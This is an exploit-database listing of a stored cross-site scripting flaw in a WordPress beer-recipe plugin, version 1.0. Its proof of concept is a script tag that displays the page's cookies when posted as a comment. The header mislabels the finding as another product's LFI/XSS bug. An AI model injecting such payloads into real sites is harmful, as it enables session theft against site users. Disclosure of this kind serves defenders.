[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Beer Recipes Plugin v.1.0 XSS Vulnerability

Author
TheUzuki
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16413
Category
web applications
Date add
25-06-2011
Platform
php
# Exploit Title: Wordpress - Beer Recipes v.1.0 XSS
# Google Dork: -
# Author: TheUzuki
# Software Link: http://opensourcebrew.org/beer-recipes-plugin/
# Version: v.1.0
# Tested on: Windows 7
# CVE : -
 
####################################################################
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
# download: http://opensourcebrew.org/beer-recipes-plugin/
#
# Author: TheUzuki.' from HF
# mail: uzuki[@]live[dot]de
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# Notes: You need to be User at the Wordpress Board
#
####################################################################
 
--Description of Wordpress Plugin--
 
Creates a custom post type for easily entering beer recipes into WordPress
 
--Exploit--
 
By Commenting a Beer Recip, with a javascript, the Javascripts,gets executed directly.
This causes a XSS.
 
--PoC--
 
<script>alert(document.cookie)</script>



#  0day.today [2024-11-15]  #